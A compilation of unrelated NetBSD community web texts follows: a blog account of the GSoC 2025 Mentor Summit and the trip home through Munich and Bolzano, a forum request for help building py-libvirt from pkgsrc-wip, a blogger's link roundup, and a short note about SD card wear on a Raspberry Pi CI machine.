Christoph Badura (<bad@>) presenting his lightning talk

Christoph Badura (<bad@>) did a lightning talk too and he presented work done by Ethan Miller. Ethan also blogged about his work, please read Google Summer of Code 2025 Reports: Asynchronous I/O Framework if you missed it!

This code was also imported by Christos Zoulas (<christos@>), thanks Christos!, and is now part of -current and it will be in NetBSD 12.0.

GSoC spammy proposals

After the Lightning talks there was a break and then at 17:30 I joined the session about GSoC spammy proposals.

This year most organizations received many more proposals, mostly due contributors starting to massively use GenAI.

A lot of suggestions and tips were shared to make the mentor review job smooth and easy as possible.

The most important suggestion is that mentors must do a 1:1 conversation with potential contributors before accepting them. The weight of the project proposal is like 2/10 and the actual 8/10 weight is on conversations between mentors and contributor.

Dinner and social event

Around 19:00 we had dinner, desserts and socialized. Stephanie also did a final talk recapping GSoC 2025 and thanking all mentors for making that possible.

We then had drinks and it then started the karaoke session (and there were a lot of pro folks doing that, very nice!).

The karaoke session at Ballroom closed with the waiter singing Closing Time (not the one by Tom Waits that is mostly instrumental, but the one by Semisonics!, I did not know it but that's melancholic as well for me, just smells a little bit less of whisky and cigs compared to the Tom Waits one ;)).

We went downstairs to the Champions Bar, had two rounds of some good Higgins Ale Works IPA and socialized a bit more. Time passed pretty quickly and also the barman there at Champions Bar started singing Closing Time!

We went a bit outside and in the lobby talking with other mentors and then I went back to my room to get some sleep for the last day of the summit.

Saturday 25, October 2025: 3rd day of Mentor Summit

I had breakfast around 8:00, a bit earlier, given that on Saturday the first session started at 9:00.

Porting & Packaging

At 9:00 I joined a session about porting and packaging. We had both FreeBSD porters, pkgsrc maintainers and other package systems maintainers on one side. On the other side there were also a lot of upstreams.

We shared do-s and don't-s on packaging.

How to get students to engage with the community

Christoph Badura (<bad@>) proposed a session to share experiences on how to get contributors to engage with the community and a lot of mentors provided a lot of great suggestions.

One thing that most mentors agreed on and worked well was to invite contributors regular (or less regular, to avoid putting too much pressure on contributors) blog posts / status updates.

Some organizations also did that as part of their weekly / bi-weekly updates that are often video meetings. In that case they reserved a slot for the contributor so that they can share their status updates.

These are great opportunities for the contributor to get in touch with the community.

Open source tools for supply chain security

I then joined a session about open source tools for supply chain security.

We discussed about Software Bill of Materials (SBOM) and its importance in the context of regulations like EU Cyber Resilience Act (CRA).

We also discussed Common Platform Enumeration (CPE) and Package URL (PURL) schemas

We talked about vulnerability management and I shared a bit my experience in pkgsrc-security@ and how often the metadata in CVEs (like vendor, product and versions affected) is not that good. Most package systems have their own workflows and usually add extra metadata only for their vulnerability DB.

I also learned about Vulnerability Exploitability eXchange (VEX) that some package systems use.

There were also mentors from AboutCode and SW360, projects that looks very interesting and I should learn more about them!

Vintage computing

Before lunch I joined the Vintage computing session.

Everyone presented themselves and talked about the most vintage computer they had, how running old machines is both fun and productive and we also talked about old Unix-es and The Unix Heritage Society.

Lunch

I had lunch at Green's Restaurant with other mentors and then socialized a bit outside Ballroom.

Waitlisted Lightning talk and funny stories

At 14:00 we had the last sessions. I went to the waitlisted Lightning talk, that can be considered the Lightning talk, round 3! :)

Mentors from different organizations shared interesting projects.

After the lightning talks several of us shared funny stories/hacks. Like learning languages in interesting ways, taking photographs of garbage to train and realize a robot that cleans it, a sort of Tinder for food... And much more! :)

Closing session

At 15:30 we had the closing session.

Some of us stayed for another 1 or 2 hours and talked, socialized a bit more and said see you soon to each other.

Going near Munich East Station and dinner with Chris

Around 17:00 I left the Munich Marriott hotel to check in to my hotel for Saturday night near Munich East Station. It was raining for most of the morning and afternoon but luckily around 17:00 it stopped and the sky seemed fine. I decided to take a walk - a bit more than 6km - to reach the hotel. Also that time I'm happy that I took a long walk because I was able to stay for most of my walk in the Englischer Garten.

Glass of Camba Island (NEIPA) beer and list of draft beers

I checked in at my hotel and then went to Tap-House where with Christoph we planned to have dinner and a couple of beers. Tap-House had a really huge choice of craft beers with 40 drafts! We had a pinsa marinara, a flatbread similar to pizza and I had a couple of small IPAs from Camba Bavaria and Yankee & Kraut Pure HBC 630, a DNEIPA.

We decided to take a walk and went to BrewsLi for some last good night beers. BrewsLi was a very nice brew pub. We sat at a table and near us there were several board games. Chris took one of this board game Mensch ärgere Dich nicht and explained to me the rules. A lot of aleatory is involved but there is also some strategy and it was funny to play and we probably played for 40 minutes or so because most of our game pieces returned to the "out" section. I took a walk with Chris back to the nearest metro station and I came back to my hotel around 2:00.

Mensch ärgere Dich nicht board game

Sunday 26, October 2025: stop in Bolzano/Bozen

On Sunday I took a train from Munich East Station to Bolzano/Bozen because it was unfeasible to go back home by train to Marche region without a stop somewhere in Italy.

View of Bolzano from St. Oswald Promenade

I went for a walk Passeggiata di Sant'Osvaldo (St. Oswald Promenade) uphill to be able to enjoy a view of the city from the top until sunset.

I had a simple but very tasty onion soup and a Gose (really good, one of the best Gose I've drunk!) and Session IPA at Batzen Häusl.

I was not able to visit anything else in the night because I was pretty tired so I went to sleep earlier.

Monday 27, October 2025: back home

In the morning I took a walk to Walther Square and nearby. I got some souvenirs for the family and then I took the trains back home and spent most of my day on the trains.

Conclusion

Google Summer of Code 2025 Mentor Summit was an amazing experience!

I had the chance to participate in very interesting talks, sessions and discussions. I met a lot of mentors from all over the world and learned about new open source projects and organizations. All the folks were also extremely positive, easy to talk to and I had a lot of fun.

Thanks to program admins and all the mentors who made this possible! Thanks a lot also to Google for organizing it and thanks to The NetBSD Foundation that permitted me to go!

NetBSD hand-written logo on the GSoC guest book

If you are new to open source, consider applying for it! If you are a seasoned open source contributor, consider participating as a mentor! You can learn more about GSoC at Google Summer of Code (GSoC) website.

I've just installed virt-manager with pkgin on NetBSD 9.2 just because I want to emulate the virtual machines with qemu + nvmm on NetBSD 9.2. The installation of virt-manager went ok. But,when I ran it,an error came up :

netbsd-marietto# virt-manager

Traceback (most recent call last):

File "/usr/pkg/share/virt-manager/virt-manager.py", line 386, in <module>

main()

File "/usr/pkg/share/virt-manager/virt-manager.py", line 247, in main

from virtManager import cli

File "/usr/pkg/share/virt-manager/virtManager/cli.py", line 29, in <module>

import libvirt

ImportError: No module named libvirt

Googling a little bit maybe I've found the solution here :

https://www.unitedbsd.com/d/285-linux-user-and-netbsd-enthusiast-hoping-to-migrate-some-day

where "kim" said :

Looking at pkgsrc/sysutils/libvirt/PLIST it doesn't look like the package provides any Python bindings -- which is what the "ImportError: No module named libvirt" error message is about. You could try py-libvirt from pkgsrc-wip and see how that works out.

I tried to start the compilation like this :

netbsd-marietto# cd /home/mario/Desktop/pkgsrc-wip/py-libvirt
netbsd-marietto# make

but I've got this error :

make: "/home/mario/Desktop/pkgsrc-wip/py-libvirt/Makefile" line 15: Could not find ../../wip/libvirt/buildlink3.mk
make: "/home/mario/Desktop/pkgsrc-wip/py-libvirt/Makefile" line 16: Could not find ../../lang/python/distutils.mk
make: "/home/mario/Desktop/pkgsrc-wip/py-libvirt/Makefile" line 17: Could not find ../../mk/bsd.pkg.mk
make: Fatal errors encountered -- cannot continue

If u want to see the content of the Makefile, it is :

gedit /home/mario/Desktop/pkgsrc-wip/py-libvirt/Makefile

#$NetBSD: Makefile,v 1.32 2018/11/30 09:59:40 adam Exp $

PKGNAME= ${PYPKGPREFIX}-${DISTNAME:S/-python//}
DISTNAME= libvirt-python-5.8.0
CATEGORIES= sysutils python
MASTER_SITES= https://libvirt.org/sources/python/

MAINTAINER= [email protected]
HOMEPAGE= https://libvirt.org/sources/python/
COMMENT= libvirt python library
LICENSE= gnu-lgpl-v2

USE_TOOLS+= pkg-config

.include "../../wip/libvirt/buildlink3.mk"
.include "../../lang/python/distutils.mk"
.include "../../mk/bsd.pkg.mk"

Can someone help me to fix the error ? very thanks.

I have a good mix today.

• Open hardware model rocketry.
• vimrc: settings based on terminal background.
• Choose Your Own Adventure, a history.
• MacPaint 1-bit patterns.  (via)
• HTTP headers that tell syndication feed fetchers how soon to come back.
• Voynich Manuscript Structural Analysis.  (via)
• Adventures in porting a Wayland Compositor to NetBSD and OpenBSD by Jeff Frasca.  Video.
• KDE Plasma 6 Wayland on FreeBSD.  Includes install instructions.
• How I felt in love with calendar.txt.  (via)
• Quality-of-life on Tetris games.
• Underworld Amusements.  A niche literary interest.
• Playing the Open Source Game.  (via)
• ++080925.

Your unrelated music video of the week: Return of the Phantom by VOID.  2025 or 1985?  Can’t easily tell.

I have a Raspberry Pi 3 with NetBSD 10, running CI jobs. Because SD cards are notoriously unreliable, I attached a USB hard drive to it. The HDD has a swap partition and scratch space for the builds, while root is on the SD. Unfortunately, some writes end up going to the root file system after all, which meant that the SD card was destroyed after only about a year!